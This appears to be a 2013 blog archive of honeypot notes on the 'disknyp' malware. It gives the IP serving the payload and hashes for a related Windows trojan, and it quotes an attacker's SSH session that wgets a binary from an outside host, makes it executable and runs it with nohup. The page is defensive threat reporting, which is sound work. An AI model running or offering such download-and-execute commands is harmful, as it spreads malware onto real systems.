Archive for December, 2013

disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:

 

141
PATTERNS AND PATTER  AN INVESTIGATION INTO  SSH ACTIVITY USINGKIPPO HONEYPOTS
CraigValli,PriyaRabadiaandAndrewWoodward
EdithCowanUniversity,Security
ResearchInstitute
Perth,Australia

c.valli@ecu.edu.au,prabadia@our.ecu.edu.au,a.woodward@ecu.edu.a

 

(to be found at http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1126&context=adf ) the download URL is already mentioned. Also clean-mx knows the file host; and on http://honey1.christiaan008.tk:8080/kippo-graph/kippo-input.php there is also a good look at these activities.

disknyp 2

Monday, December 16th, 2013

Meanwhile I captured  268 samples of disknyp.

Can be found on: http://198.2.192.204:22/disknyp

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from:

http://ha-hfs.googlecode.com/files/hfs2.3 beta271.exe

Also available for download on this webserver is a

svch.exe , probably infected for window-machines.

Virustotal says, only 24 from 48 antivir-vendors discover this

trojan.

MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b

 

 

disknyp

Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
–2013-12-01 03:58:03–  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887 Bytes  ELF 32-bit LSB executable. I don’t know yet what it is doing..